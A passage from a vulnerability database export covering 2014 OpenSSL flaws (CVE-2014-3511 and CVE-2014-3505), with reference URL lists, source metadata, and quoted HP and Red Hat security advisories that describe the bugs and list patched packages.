"https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682034" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098252" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689886" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682016" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687099" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691162" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15564.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683744" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.2, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792" }, { "trust": 0.2, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.2, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=280b1f1ad12131defcd986676a8fc9717aaa601b" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35208" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-3511" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512\u003e" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140806.txt\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:18.openssl.asc\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139\u003e" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04486577-1" }, { "trust": 0.1, "url": "https://technet.microsoft.com/library/security/3009008" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-5139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3509" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6449" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3510" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3505" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3511" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7995" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05111017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4969" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05130958" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightcontrol" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightmanagement" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2019" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2018" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2022" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2027" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2026" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2021" }, { "trust": 0.1, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3509" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3511" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-2557aa7dc1654cf6b547c1a9e4" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-bd2042a1c7574aad90c4839efe" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-57ab6bb78b6e47a18718f44133" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-00eb9ac82e86449e8c3ba101bd" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-34bcab41ac7e4db299e3f5f2f1" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-062078f1ae354b7e99c86c151c" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-5827037475e44abab586463723" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-7b23e47d5d9b420b94bd1323eb" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3511" }, { "db": "BID", "id": "69079" }, { "db": "PACKETSTORM", "id": "130299" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "130359" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-3511" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3511" }, { "db": "BID", "id": "69079" }, { "db": "PACKETSTORM", "id": "130299" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "130359" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-3511" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3511" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69079" }, { "date": "2015-02-09T21:09:18", "db": "PACKETSTORM", "id": "130299" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-09-09T17:32:22", "db": "PACKETSTORM", "id": "128214" }, { "date": "2015-03-13T17:11:00", "db": "PACKETSTORM", "id": "130815" }, { "date": "2015-03-25T00:42:25", "db": "PACKETSTORM", "id": "131014" }, { "date": "2015-06-29T15:35:42", "db": "PACKETSTORM", "id": "132467" }, { "date": "2014-12-26T15:46:37", "db": "PACKETSTORM", "id": "129721" }, { "date": "2015-05-29T23:37:43", "db": "PACKETSTORM", "id": "132085" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2016-06-02T19:12:12", "db": "PACKETSTORM", "id": "137292" }, { "date": "2016-05-26T09:22:00", "db": "PACKETSTORM", "id": "137201" }, { "date": "2015-05-29T23:37:11", "db": "PACKETSTORM", "id": "132081" }, { "date": "2015-02-12T00:29:07", "db": "PACKETSTORM", "id": "130359" }, { "date": "2015-04-02T00:37:56", "db": "PACKETSTORM", "id": "131254" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-13T23:55:07.623000", "db": "NVD", "id": "CVE-2014-3511" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2014-3511" }, { "date": "2016-09-09T15:00:00", "db": "BID", "id": "69079" }, { "date": "2023-11-07T02:20:10.770000", "db": "NVD", "id": "CVE-2014-3511" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "69079" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL CVE-2014-3511 Man in the Middle Security Bypass Vulnerability", "sources": [ { "db": "BID", "id": "69079" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "69079" } ], "trust": 0.3 } }
var-201408-0094
Vulnerability from variot
Double free vulnerability in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (application crash) via crafted DTLS packets that trigger an error condition. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8zb, 1.0.0n, and 1.0.1i are vulnerable. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04426586
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04426586 Version: 1
HPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service (DoS) or Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-09-12 Last Updated: 2014-09-12
Potential Security Impact: Remote Denial of Service (DoS), disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenVMS running OpenSSL.
References:
CVE-2014-3505 - Remote Denial of Service (DoS) CVE-2014-3506 - Remote Denial of Service (DoS) CVE-2014-3507 - Remote Denial of Service (DoS) CVE-2014-3508 - Remote Disclosure of Information CVE-2014-3510 - Remote Denial of Service (DoS)
SSRT101686
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SSL Version 1.4-476 and earlier for OpenVMS
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software update available to resolve the vulnerabilities with HP OpenVMS running OpenSSL.
HP SSL Version 1.4-493 for OpenVMS is available from the following
location:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
HISTORY Version:1 (rev.1) - 12 September 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2014:1052-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html Issue date: 2014-08-13 CVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 CVE-2014-3511 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A race condition was found in the way OpenSSL handled ServerHello messages with an included Supported EC Point Format extension. A malicious server could possibly use this flaw to cause a multi-threaded TLS/SSL client using OpenSSL to write into freed memory, causing the client to crash or execute arbitrary code. (CVE-2014-3509)
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3508)
A flaw was found in the way OpenSSL handled fragmented handshake packets. A man-in-the-middle attacker could use this flaw to force a TLS/SSL server using OpenSSL to use TLS 1.0, even if both the client and the server supported newer protocol versions. (CVE-2014-3511)
Multiple flaws were discovered in the way OpenSSL handled DTLS packets. A remote attacker could use these flaws to cause a DTLS server or client using OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3505, CVE-2014-3506, CVE-2014-3507)
A NULL pointer dereference flaw was found in the way OpenSSL performed a handshake when using the anonymous Diffie-Hellman (DH) key exchange. A malicious server could cause a DTLS client using OpenSSL to crash if that client had anonymous DH cipher suites enabled. (CVE-2014-3510)
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions 1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext 1127499 - CVE-2014-3505 openssl: DTLS packet processing double free 1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion 1127502 - CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments 1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service 1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-1.0.1e-16.el6_5.15.ppc.rpm openssl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm
s390x: openssl-1.0.1e-16.el6_5.15.s390.rpm openssl-1.0.1e-16.el6_5.15.s390x.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-devel-1.0.1e-16.el6_5.15.s390.rpm openssl-devel-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-static-1.0.1e-16.el6_5.15.ppc64.rpm
